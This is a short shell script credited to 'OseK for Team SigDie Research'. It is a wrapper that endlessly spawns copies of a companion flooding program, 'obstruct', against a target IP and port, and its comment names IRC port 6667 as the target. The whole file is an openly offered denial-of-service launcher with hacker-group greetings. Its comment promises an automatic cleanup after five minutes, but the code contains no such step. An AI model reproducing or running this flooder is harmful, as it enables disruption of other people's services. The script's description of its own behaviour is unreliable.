#!/bin/sh
# 
# Obstruct.C Supplement Code
# written by OseK for Team SigDie Research
#
# Description: This is a simple looping util to flood
#              endlessly against port 6667 of the target host
# 
# I know.. why not write it in C-File.. Simple... Im lazy.
#
# Greets out to Terminal, Synco, TsTech, elian, Ho0ke, gh0zt,
#               wizy, vaL0rz, _KeyLock_, snizzy, Maximpact,
#               Solaris8, vimd, vMAC, XG3, and whatever.
#

BANNER="[1;34mObstruct[0;34m.[1;34mC [0;37mby [1;34mOseK [0;37mfor [1;37mTeam SigDie Research[0;37m"

# set an automatic cleanup 5 minutes after flood has begun:

if [ "$1" = "" ]; then
   echo $BANNER
   echo "[1;34mUsage[0;34m:[0;37m $0 [0;34m<[0;37mip[0;34m> <[0;37mport[0;34m>[0;37m"
else
   echo $BANNER
   echo ""
   echo "Obstructing Justice on [1;34m$1[0;37m port [1;34m$2[0;37m.."
   echo "Press [1;34mCTRL[0;34m-[1;34mC[0;37m to exit."
   echo ""
   echo "[[1;32m.[0;37m] = 1 successful connection"
   echo "[[1;31mx[0;37m] = 1 unestablished connection"
   echo ""
   echo -n "=> "
   while [ 2 = 2 ]; do
         timer=0
         while [ $timer -lt 1 ]; do
               ./obstruct $1 $2 &
               ./obstruct $1 $2 &
               let timer=timer+1
         done
   done
fi


